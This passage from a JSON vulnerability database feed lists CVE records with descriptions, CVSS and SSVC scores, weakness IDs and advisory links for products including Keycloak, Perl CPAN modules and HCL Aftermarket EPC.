EFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T12:53:10.647332Z","id":"CVE-2026-59695","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db","type":"Secondary","description":[{"lang":"en","value":"CWE-1284"}]}],"references":[{"url":"https://cna.erlef.org/cves/CVE-2026-59695.html","source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db"},{"url":"https://github.com/ZenHive/mpp/commit/5d6338e2334084c5f2a78cfcca474830733ed7e8","source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db"},{"url":"https://github.com/ZenHive/mpp/security/advisories/GHSA-vv77-66rf-pm86","source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db"},{"url":"https://osv.dev/vulnerability/EEF-CVE-2026-59695","source":"6b3ad84c-e1a6-4bf7-a703-f496b71e49db"},{"url":"https://github.com/ZenHive/mpp/security/advisories/GHSA-vv77-66rf-pm86","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-15943","sourceIdentifier":"secalert@redhat.com","published":"2026-07-17T12:17:03.313","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A flaw was found in the Keycloak keycloak-services component, which handles the management of identity providers. The issue occurs when a delegated administrator updates an OIDC identity provider using a masked client secret sentinel value. Due to improper validation, Keycloak reuses the existing real secret even if security-sensitive fields like the token URL have been changed, allowing an attacker to redirect and capture the secret."}],"affected":[{"source":"secalert@redhat.com","affectedData":[{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-keycloak-rhel9/rhbk-keycloak-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-openshift-rhel9/rhbk-openshift-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Data Grid 8","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jboss_data_grid:8"]},{"vendor":"Red Hat","product":"Red Hat JBoss Enterprise Application Platform Expansion Pack","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/jbossnetwork/restricted/listSoftware.html","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jbosseapxp"]},{"vendor":"Red Hat","product":"Red Hat Single Sign-On 7","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:red_hat_single_sign_on:7"]}]}],"metrics":{"cvssMetricV31":[{"source":"secalert@redhat.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.2,"impactScore":4.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:52:50.320761Z","id":"CVE-2026-15943","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"secalert@redhat.com","type":"Secondary","description":[{"lang":"en","value":"CWE-1288"}]}],"references":[{"url":"https://access.redhat.com/security/cve/CVE-2026-15943","source":"secalert@redhat.com"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2501270","source":"secalert@redhat.com"}]}},{"cve":{"id":"CVE-2026-13082","sourceIdentifier":"9b29abf9-4ab0-4765-b253-1875cd9b441e","published":"2026-07-17T13:17:55.443","lastModified":"2026-07-17T18:17:14.137","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"GD::SecurityImage versions through 1.75 for Perl use rand to generate secrets.\n\nThe random method creates the challenge text used for the CAPTCHA by sampling characters from an array using Perl's built-in rand function, and generates a (by default) six-character string.\n\nThe built-in rand function is unsuitable for security applications because it is predictable and reversible."}],"affected":[{"source":"9b29abf9-4ab0-4765-b253-1875cd9b441e","affectedData":[{"vendor":"BURAK","product":"GD::SecurityImage","defaultStatus":"unaffected","collectionURL":"https://cpan.org/modules","packageName":"GD-SecurityImage","programFiles":["lib/GD/SecurityImage.pm"],"programRoutines":[{"name":"GD::SecurityImage::random"},{"name":"GD::SecurityImage::random_angle"},{"name":"GD::SecurityImage::particle"}],"repo":"https://github.com/burak/CPAN-GD-SecurityImage","versions":[{"version":"0","lessThanOrEqual":"1.75","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:29:10.397745Z","id":"CVE-2026-13082","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"9b29abf9-4ab0-4765-b253-1875cd9b441e","type":"Secondary","description":[{"lang":"en","value":"CWE-338"},{"lang":"en","value":"CWE-804"}]}],"references":[{"url":"https://security.metacpan.org/patches/G/GD-SecurityImage/1.75/CVE-2026-13082-r1.patch","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"https://www.cve.org/CVERecord?id=CVE-2025-40916","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"}]}},{"cve":{"id":"CVE-2026-13410","sourceIdentifier":"9b29abf9-4ab0-4765-b253-1875cd9b441e","published":"2026-07-17T13:17:56.663","lastModified":"2026-07-17T18:17:14.283","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Dancer::Plugin::Auth::Google versions through 0.07 for Perl have TLS verification disabled.\n\nThe default user agent is initialised with SSL_verify_mode explicitly disabled.\n\nAn attacker with network man-in-the-middle (MITM) capability between the Dancer application and googleapis.com can intercept the OAuth2 token exchange and userinfo fetch, return a forged access_token and user profile, and be logged in to the Dancer application as any Google user."}],"affected":[{"source":"9b29abf9-4ab0-4765-b253-1875cd9b441e","affectedData":[{"vendor":"GARU","product":"Dancer::Plugin::Auth::Google","defaultStatus":"unaffected","collectionURL":"https://cpan.org/modules","packageName":"Dancer-Plugin-Auth-Google","programFiles":["lib/Dancer/Plugin/Auth/Google.pm"],"programRoutines":[{"name":"Dancer::Plugin::Auth::Google::auth_google_init"}],"repo":"https://github.com/garu/Dancer-Plugin-Auth-Google","versions":[{"version":"0","lessThanOrEqual":"0.07","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:L","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"LOW"},"exploitabilityScore":1.6,"impactScore":6.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:32:46.580941Z","id":"CVE-2026-13410","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"9b29abf9-4ab0-4765-b253-1875cd9b441e","type":"Secondary","description":[{"lang":"en","value":"CWE-295"}]}],"references":[{"url":"https://github.com/garu/Dancer-Plugin-Auth-Google/pull/5","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"https://metacpan.org/pod/Furl#HTTPS-requests-claims-warnings!","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"https://security.metacpan.org/patches/D/Dancer-Plugin-Auth-Google/0.07/CVE-2026-13410-r1.patch","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"http://www.openwall.com/lists/oss-security/2026/07/17/8","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-7189","sourceIdentifier":"iletisim@usom.gov.tr","published":"2026-07-17T13:19:01.490","lastModified":"2026-07-17T16:17:17.653","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Insertion of sensitive information into sent data vulnerability in Proliz Software Ltd. Co. Proliz's OBS allows Accessing Functionality Not Properly Constrained by ACLs.\n\nThis issue affects Proliz's OBS: before v3.6.0."}],"affected":[{"source":"iletisim@usom.gov.tr","affectedData":[{"vendor":"Proliz Software Ltd. Co.","product":"Proliz's OBS","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"v3.6.0","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:52:12.057196Z","id":"CVE-2026-7189","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-201"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0571","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-23564","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:16.513","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is affected by Business Logic Vulnerability using which a non valid user of the application can obtain passwords from the server and redirect them to their own email address by manipulating the server's response. The application includes checks in the initial requests to verify the validity of the provided UserId, but similar validation is not applied to Email requests when sending passwords to user emails."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCL Software","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","baseScore":9.1,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:54:35.346135Z","id":"CVE-2024-23564","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-326"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0131787","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-23565","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:16.647","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is vulnerable to email flooding as the application does not have a proper mail limitation mechanism at Forget Password functionality. The actor could b e a human or an automated process such as a virus or bot. This could be used to cause a denial of service, compromise program logic or other consequences."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:14:30.173827Z","id":"CVE-2024-23565","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-799"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-23566","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:16.760","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is vulnerable to brute force attacks since application doesn’t have captcha implemented. It can lead to various security issues like brute force , automated attacks & account enumeration"}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":2.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:13:41.911506Z","id":"CVE-2024-23566","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-804"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-23567","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:16.877","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is affected by Sensitive Information in GET method & in URL which allows application to pass sensitive data via URL parameters during normal usage. Data passed in this manner can be exposed because it may end up stored in unintended locations, including server logs, local browser history and proxy logs."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:52:09.974386Z","id":"CVE-2024-23567","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-804"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-23568","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:16.990","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is vulnerable to attacks since the server software version used by the application is revealed by the web server. Displaying version information of software could allow an attacker to determine which vulnerabilities are present in the software, particularly if an outdated software version is in use with published vulnerabilities."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:17:06.324093Z","id":"CVE-2024-23568","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-200"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-23569","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:17.110","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is vulnerable to attack since the server is not configured with “X-XSS-Protection\" header"}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:22:12.429550Z","id":"CVE-2024-23569","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-692"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-23570","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:17.223","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is affected by clickjacking vulnerability Cross-Frame Scripting is an attack technique where an attacker loads a vulnerable application in an iFrame on his malicious site. The attacker can then launch a Clickjacking attack, which may lead to Phishing, Cross-Site Request Forgery, sensitive information leakage and more."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:23:12.489637Z","id":"CVE-2024-23570","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-200"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-23571","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:17.343","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is vulnerable to attack since the application does not have an appropriate caching policy specifying the extent to which the page and its form fields should be cached. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:18:26.429399Z","id":"CVE-2024-23571","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-525"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-23572","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:17.460","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is vulnerable to attack as cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N","baseScore":4.2,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":2.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:23:46.654941Z","id":"CVE-2024-23572","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-614"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-23573","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:17.573","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is vulnerable to attack since the Application is vulnerable to Lucky 13. that makes the SS LLUCKY13 possible affects the TLS1.1and 1.2 and DTLS1.0 or 1.2 implementations . It also affects previous versions such as SSL3.0 and TLS1.0. This can also be considered a type of man-in-the-middle attack."}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 1.0.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@hcl.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":3.7,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:17:45.705792Z","id":"CVE-2024-23573","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@hcl.com","type":"Secondary","description":[{"lang":"en","value":"CWE-425"}]}],"references":[{"url":"https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0132294","source":"psirt@hcl.com"}]}},{"cve":{"id":"CVE-2024-23574","sourceIdentifier":"psirt@hcl.com","published":"2026-07-17T14:17:17.693","lastModified":"2026-07-17T17:56:08.130","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"HCL Aftermarket EPC is vulnerable to attack since It was found that a malicious actor can use brute-force techniques to either guess or confirm valid users in the system. Use renumeration is when a malicious actor can use brute-force techniques to either guess or confirm valid users in a system"}],"affected":[{"source":"psirt@hcl.com","affectedData":[{"vendor":"HCLSoftware","product":"Aftermarket EPC","defaultStatus":"unaffected","versions":[{"version":"version 